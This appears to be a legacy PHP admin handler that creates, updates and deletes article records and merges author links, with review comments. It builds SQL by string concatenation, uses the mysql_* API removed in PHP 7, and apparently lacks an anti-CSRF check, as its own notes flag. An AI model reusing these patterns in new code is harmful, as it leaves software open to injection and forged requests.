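<?php
/**
 * Admin action handler for the Articles table.
 *
 * Reads the requested action ("todo_selected") and the target article id
 * ("id_selected") through take_variable(), then:
 *   - "insert": creates an Articles row plus an initial Revisions row and
 *               redirects to the new card's modification page;
 *   - "update": rewrites the editable columns, merges pending author links
 *               from AA_temp into AA, and stamps updated/updated_by;
 *   - "erase":  deletes the article's revisions, the article and its AA links;
 *   - anything else (including "cancel"): returns to index.php.
 *
 * Helpers (languify, fields_to_update, take_variable, addtexslashes,
 * fill_var_enruua, enruua, tell, go, delete_revision), $session, $_charset and
 * $_db are not defined here; presumably they come from the files loaded below.
 *
 * NOTE(review): no anti-CSRF token check is visible in this file, and
 * take_variable() is called without a source argument for the action and id,
 * so it may accept them from the query string. Confirm that the loaded auth
 * code enforces both authentication and a per-request token before these
 * state-changing branches run.
 */
$page_title = "Manage articles table: action performed";

// NOTE(review): markup is sent before session.php is loaded; if that file
// starts a session or sets cookies, headers can no longer be sent. Confirm.
echo "<HTML><BODY>";

require("../login/include/session.php");
//require_once("header.php");
// require instead of include: a missing or unreadable auth file must stop the
// request instead of letting the script continue with only a warning.
require("../auth/auth.php");
require("functions_admin.php");

$lang = languify(isset($_POST['lang']) ? $_POST['lang'] : null);
$_updcols = fields_to_update("article");
// NOTE(review): SET NAMES changes the charset on the server side only;
// mysql_real_escape_string() below is only charset-aware when the charset is
// set with mysql_set_charset(). The legacy mysql_* API was removed in PHP 7.
mysql_query("SET NAMES ".$_charset);

$todo_selected = take_variable("todo_selected");
$id_selected = take_variable("id_selected");
// The id is request-controlled: refuse array input, then keep one form for
// SQL string literals and one for text handed to tell().
$id_selected = is_scalar($id_selected) ? (string)$id_selected : "";
$id_selected_sql = mysql_real_escape_string($id_selected);
$id_selected_html = htmlspecialchars($id_selected, ENT_QUOTES);

$title_en = addtexslashes(take_variable("title_en", "POST"));
$title_ru = addtexslashes(take_variable("title_ru", "POST"));
$title_ua = addtexslashes(take_variable("title_ua", "POST"));
// Was take_variable($notes, "POST"): $notes is not assigned before this line
// in this file, so the field name was presumably meant as a literal.
$notes = trim(take_variable("notes", "POST"));

switch ($todo_selected) {
    case "insert":
        fill_var_enruua("title", "trim");
        // Collect names and values as lists so a skipped (empty) first column
        // cannot leave a leading comma in the statement.
        $names = array();
        $values = array();
        foreach ($_updcols as $val) {
            if (!$val) {
                continue;
            }
            $names[] = $val;
            // NOTE(review): htmlspecialchars(ENT_QUOTES) encodes both quote
            // characters, but a backslash is only neutralised if
            // addtexslashes() escapes it. Confirm, or bind these values.
            //$values=$values."'".quotemeta(take_variable($val,"POST"))."'";
            $values[] = "'".addtexslashes(htmlspecialchars(take_variable($val, "POST"), ENT_QUOTES))."'";
        }
        // $session->author_id is placed unquoted, as before; it is read from
        // the session object, not from the request.
        $q = "insert into Articles (".implode(",", $names).",created,created_by,updated_by) values ("
            .implode(",", $values).",now(),".$session->author_id.",".$session->author_id.")";
        $res = mysql_query($q);
        if ($res && ($id = mysql_insert_id())) {
            mysql_query("insert into Revisions (article_id,revision_received,created,created_by,updated_by) values ('".$id."', now(), now(),'".$session->author_id."','".$session->author_id."') ");
            tell(enruua("By your request, I have created in the articles table a new card with number",
                        "По Вашему запросу в таблице статей создана новая карточка с номером",
                        "За Вашим бажанням в таблиці статей створенo нову картку з номером")." ".$id
                .enruua("", "", "").". "
                .enruua("You will now be redirected to that card's modification page",
                        "Сейчас будет открыта страница редактирования этой карточки",
                        "Зараз буде відкрито сторінку редагування цієї картки"));
            go("manage_articles_action.php", array("id_selected", "todo"), array($id, "modify"));
        } else {
            tell(enruua("Errors have happened when inserting a new record",
                        "При создании новой карточки в таблице статей возникли ошибки",
                        "При створенні нової картки в таблиці статей виникли помилки")."!");
            go("index.php");
        }
        break;

    case "update":
        fill_var_enruua("title", "trim");
        // A column is updated only when a variable of the same name is already
        // set in this scope, so local names here are part of the behaviour.
        $command = "";
        foreach ($_updcols as $val) {
            if (isset(${$val})) {
                if ($command) {
                    $command = $command.",";
                }
                //${$val}=mysql_real_escape_string(${$val});
                ${$val} = addtexslashes(htmlspecialchars(take_variable($val, "POST"), ENT_QUOTES));
                $command = $command.$val."='".${$val}."'";
            }
        }
        // Keep the UPDATE result in its own variable: the original reused $res
        // for the SELECT below, so the final message reported the SELECT.
        // An empty column list counts as success, as it effectively did before.
        $article_updated = true;
        if ($command !== "") {
            $article_updated = mysql_db_query($_db, "UPDATE Articles SET ".$command." WHERE id='".$id_selected_sql."'");
        }

        // Clearing AA for this article before the merge was disabled on
        // 22.01.2007; the merge below may only matter under concurrent edits.
        $res = mysql_db_query($_db, "SELECT id, author_id, article_id,author_ambition FROM AA_temp WHERE article_id='".$id_selected_sql."'");
        while ($res && ($aa_temp = mysql_fetch_array($res))) {
            // Rows read back from the database are escaped again before reuse
            // in SQL; stored values are not trusted to be literal-safe.
            $tmp_author = mysql_real_escape_string($aa_temp['author_id']);
            $tmp_article = mysql_real_escape_string($aa_temp['article_id']);
            $tmp_ambition = mysql_real_escape_string($aa_temp['author_ambition']);

            $res_prev_from_aa = mysql_db_query($_db, "SELECT id,author_id,article_id, author_ambition FROM AA WHERE article_id='".$id_selected_sql."'");
            $should_insert_something = 1;
            // Look for an existing AA link for the same author and article.
            while ($res_prev_from_aa && ($prev_from_aa = mysql_fetch_array($res_prev_from_aa))) {
                if (($prev_from_aa['author_id'] == $aa_temp['author_id'])
                    && ($prev_from_aa['article_id'] == $aa_temp['article_id'])) {
                    mysql_db_query($_db, "UPDATE AA set author_ambition='".$tmp_ambition."' WHERE id='".mysql_real_escape_string($prev_from_aa['id'])."' ");
                    $should_insert_something = 0;
                    break; // first match wins
                }
            }
            if ($should_insert_something) {
                $res_aa = mysql_db_query($_db, "REPLACE INTO AA (author_id,article_id, author_ambition) VALUES ('".$tmp_author."', '".$tmp_article."', '".$tmp_ambition."') ");
            }
        }
        // Now flush from AA_temp what concerns this article.
        $q = mysql_db_query($_db, "DELETE FROM AA_temp WHERE article_id='".$id_selected_sql."' ");

        if ($article_updated) {
            mysql_query("update Articles set updated=now(),updated_by='".$session->author_id."' where id='".$id_selected_sql."' ");
            tell(enruua("The record corresponding to Article", "Карточка статьи", "Картка статті")
                ." ".$id_selected_html." "
                .enruua("have been successfully updated", "успешно обновлена", "успішно оновлено").".");
        } else {
            tell(enruua("The record corresponding to Article", "Карточку статьи", "Картка статті")
                ." ".$id_selected_html." "
                .enruua("could not be updated", "обновить не удалось", "оновити не вдалося")."!");
        }
        go("manage_articles_action.php", array("id_selected", "todo"), array($id_selected, "modify"));
        break;

    case "erase":
        $resrev = mysql_query("select id from Revisions where article_id='".$id_selected_sql."'");
        while ($resrev && ($r = mysql_fetch_array($resrev))) {
            delete_revision($r['id'], TRUE);
        }
        // Report success only when both deletes succeed; the original ignored
        // the result of the Articles delete.
        $res_article = mysql_query("delete from Articles where id='".$id_selected_sql."'");
        $resa = mysql_query("delete from AA where article_id='".$id_selected_sql."'");
        if ($res_article && $resa) {
            tell(enruua("The record corresponding to Article", "Карточка статьи", "Картка статті")
                ." ".$id_selected_html." "
                .enruua("have been successfully deleted", "успешно удалена", "успішно видалено").".");
        } else {
            tell(enruua("Errors have happened when deleting the record for Article",
                        "При удалении карточки статьи",
                        "При видаленні картки статті")
                ." ".$id_selected_html." "
                .enruua("", "возникли ошибки", "виникли помилки")."!");
        }
        go("index.php");
        break;

    case "cancel":
    default:
        go("index.php");
        break;
}
//require("footer.php");
?>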